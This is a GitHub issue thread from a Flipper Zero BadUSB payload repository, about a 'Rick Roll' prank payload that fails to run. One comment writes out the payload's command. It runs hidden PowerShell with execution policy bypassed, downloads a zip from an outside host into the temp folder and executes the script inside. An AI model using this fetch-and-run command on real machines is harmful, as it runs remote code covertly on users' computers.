I-Am-Jakoby / Flipper-Zero-BadUSB

Repository for my flipper zero badUSB payloads. Now almost entirely plug and play.
5.01k stars 642 forks source link

Won't start Rick Roll #46

Open math3011 opened 1 year ago

math3011 commented 1 year ago

When i run the Rick Roll it runs and opens the powershell for a second and closes it again but when I try moving my mouse nothing happens. But if I manualy write it and hit enter it runs and opens powershell and when I move my mouse it starts.

I-Am-Jakoby commented 1 year ago

What language is your keyboard? if it is not in english it will not work properly

lonlonranchdressing commented 1 year ago

I have the same issue added a delay 9000 command after the string to debug instead of typing STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1"

it's instead typing powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1"r.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1"

seems to be eating some keys disabled antivirus on the off chance that it was somehow messing with it US keyboard here as well any thoughts?